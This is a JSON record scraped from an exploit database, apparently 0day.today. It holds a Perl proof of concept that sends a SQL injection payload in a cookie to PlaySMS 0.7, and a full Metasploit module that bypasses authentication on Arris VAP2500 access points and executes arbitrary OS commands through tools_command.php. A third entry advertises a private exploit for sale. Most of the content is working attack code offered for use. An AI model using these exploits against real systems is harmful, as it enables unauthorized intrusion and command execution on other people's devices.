PlaySMS <= 0.7 SQL Injection Exploit

{"type": "zdt", "lastseen": "2016-04-19T04:03:34", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "PlaySMS <= 0.7 SQL Injection Exploit", "published": "2004-08-19T00:00:00", "href": "http://0day.today/exploit/description/8424", "cvss": {"vector": "NONE", "score": 0.0}, "description": "Exploit for linux platform in category remote exploits", "hash": "3f56a8dc2a61d5da18dbb843d654a3ac1b155975fd6b6a6fe2be30757483ebcf", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "====================================\r\nPlaySMS <= 0.7 SQL Injection Exploit\r\n====================================\r\n\r\n#!/usr/bin/perl \r\n# PlaySMS version 0.7 and prior SQL Injection PoC \r\n# Written by Noam Rathaus of Beyond Security Ltd. \r\n# \r\n\r\nuse IO::Socket; \r\nuse strict; \r\n\r\nmy $host = $ARGV[0]; \r\n\r\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, PeerPort => \"80\" ); \r\n\r\nunless ($remote) { die \"cannot connect to http daemon on $host\" } \r\n\r\nprint \"connected \"; \r\n\r\n$remote->autoflush(1); \r\n\r\nmy $http = \"GET /~playsms/fr_left.php HTTP/1.1 \r\nHost: $host:80 \r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 \r\nFirefox/0.9.1 \r\nAccept: \r\ntext/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 \r\nAccept-Language: en-us,en;q=0.5 \r\nAccept-Encoding: gzip,deflate \r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \r\nKeep-Alive: 300 \r\nCookie: vc1=ticket; vc2='%20union%20select%20'ticket; \r\nContent-Type: application/x-www-form-urlencoded \r\nConnection: close \r\n\r\n\"; \r\n\r\nprint \"HTTP: [$http] \"; \r\nprint $remote $http; \r\nsleep(1); \r\nprint \"Sent \"; \r\n\r\nwhile (<$remote>) \r\n{ \r\nprint $_; \r\n} \r\nprint \" \"; \r\n\r\nclose $remote; \r\n\r \n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-8424", "sourceHref": "http://0day.today/exploit/8424", "modified": "2004-08-19T00:00:00", "reporter": "Noam Rathaus", "viewCount": 1, "enchantments": {"vulnersScore": 7.5}}

{"result": {"zdt": [{"lastseen": "2016-04-20T02:17:29", "references": [], "description": "Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username.", "edition": 1, "reporter": "metasploit", "published": "2015-01-22T00:00:00", "type": "zdt", "title": "Arris VAP2500 Command Execution Exploit", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8424", "CVE-2014-8423"], "modified": "2015-01-22T00:00:00", "id": "1337DAY-ID-23173", "href": "http://0day.today/exploit/description/23173", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Arris VAP2500 tools_command.php Command Execution',\r\n 'Description' => %q{\r\n Arris VAP2500 access points are vulnerable to OS command injection in the web management\r\n portal via the tools_command.php page. Though authentication is required to access this\r\n page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid\r\n username.\r\n },\r\n 'Author' =>\r\n [\r\n 'HeadlessZeke' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8423'],\r\n ['CVE', '2014-8424'],\r\n ['OSVDB', '115045'],\r\n ['OSVDB', '115046'],\r\n ['BID', '71297'],\r\n ['BID', '71299'],\r\n ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']\r\n ],\r\n 'DisclosureDate' => 'Nov 25 2014',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 1024,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic telnet'\r\n }\r\n },\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => '/tools_command.php',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n })\r\n if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n\r\n unless check == Exploit::CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n\r\n print_status(\"#{peer} - Exploiting...\")\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n exploit_cmd\r\n else\r\n exploit_session\r\n end\r\n end\r\n\r\n def exploit_cmd\r\n beg_boundary = rand_text_alpha(8)\r\n end_boundary = rand_text_alpha(8)\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri('/', 'tools_command.php'),\r\n 'vars_post' => {\r\n 'cmb_header' => '',\r\n 'txt_command' => \"echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}\"\r\n },\r\n 'method' => 'POST',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n })\r\n\r\n if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/\r\n print_good(\"#{peer} - Command sent successfully\")\r\n if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m\r\n print_status(\"#{peer} - Command output: #{$1}\")\r\n end\r\n else\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Command execution failed\")\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def exploit_session\r\n begin\r\n send_request_cgi({\r\n 'uri' => normalize_uri('/', 'tools_command.php'),\r\n 'vars_post' => {\r\n 'cmb_header' => '',\r\n 'txt_command' => \"#{payload.encoded}\"\r\n },\r\n 'method' => 'POST',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n }, 3)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/23173", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "hash": "40ac6cbd6a8dc79c316c99d3a79496e58606b4228dae45579019f36a1ac7bfc9"}, {"lastseen": "2016-04-19T10:03:26", "references": [], "description": "ARRIS VAP2500 - WIRELESS VIDEO ACCESS POINT \r This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ARRIS VAP2500. Authentication is not required to exploit this vulnerability.\r The specific flaw exists within the handling of user authentication. The issue lies in the failure to compare the password when authenticating. An attacker can leverage this vulnerability to bypass authentication checks which can then be chained to execute code with root privileges.\n\nThis is private exploit. You can buy it at http://0day.today", "edition": 1, "reporter": "rrdw", "published": "2014-11-30T00:00:00", "type": "zdt", "title": "ARRIS VAP2500 Management Portal Authentication Bypass Vulnerability", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8424"], "modified": "2014-11-30T00:00:00", "href": "http://0day.today/exploit/description/22946", "id": "1337DAY-ID-22946", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "", "hash": "101a89f00d5c327bc400413bc808e080506507432ae228ae8bcf4a92f91062e9"}]}}